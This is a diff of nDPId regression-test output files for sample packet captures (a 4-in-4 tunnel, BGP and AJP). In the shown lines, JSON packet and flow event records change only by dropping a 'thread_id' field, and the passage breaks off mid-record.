00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":14,"global_ts_msec":1537165843864} 00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":14,"global_ts_msec":1537165843864}
00505{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJTPEAAA\/wQqkEVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGz7LQACAAABZb+KAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="} 00491{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJTPEAAA\/wQqkEVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGz7LQACAAABZb+KAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="}
00201{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537165843864} 00187{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537165843864}
00471{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":17,"global_ts_msec":1537165843864} 00471{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":17,"global_ts_msec":1537165843864}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 5/0 ~~ packets captured/processed: 5/0
@@ -27,6 +27,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 206 chars ~~ json string min len.......: 192 chars
~~ json string max len.......: 510 chars ~~ json string max len.......: 496 chars
~~ json string avg len.......: 358 chars ~~ json string avg len.......: 344 chars

8
test/results/BGP_redist.pcap.out
View File

@@ -1,7 +1,7 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"BGP_redist.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"BGP_redist.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1256636836167} 00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1256636836167}
00517{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="} 00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="}
00201{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":104,"thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","protocol":34887,"global_ts_msec":1256636836167} 00187{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":104,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","protocol":34887,"global_ts_msec":1256636836167}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3}
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"}
00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
@@ -19,6 +19,6 @@
~~ total memory freed........: 4679827 bytes ~~ total memory freed........: 4679827 bytes
~~ total allocations/frees...: 101144/101144 ~~ total allocations/frees...: 101144/101144
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 206 chars ~~ json string min len.......: 192 chars
~~ json string max len.......: 679 chars ~~ json string max len.......: 679 chars
~~ json string avg len.......: 434 chars ~~ json string avg len.......: 427 chars

54
test/results/ajp.pcap.out
View File

@@ -3,37 +3,37 @@
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"}
00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="}
00211{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00197{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="}
00211{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00197{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447}
00394{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYEAAQAYOBKwdCZOsHQmSH0mXyJOgLrlyxds1gBAAcnzPAAABAQgKHlfv2U6caeg="} 00380{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYEAAQAYOBKwdCZOsHQmSH0mXyJOgLrlyxds1gBAAcnzPAAABAQgKHlfv2U6caeg="}
00211{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447} 00197{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447}
00405{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADnBYUAAQAYN\/qwdCZOsHQmSH0mXyJOgLrlyxds1gBgAcjJ\/AAABAQgKHlfv2U6caehBQgABCQ=="} 00391{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADnBYUAAQAYN\/qwdCZOsHQmSH0mXyJOgLrlyxds1gBgAcjJ\/AAABAQgKHlfv2U6caehBQgABCQ=="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":10,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":57,"global_ts_msec":1505154584448} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":10,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":57,"global_ts_msec":1505154584448}
01502{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhd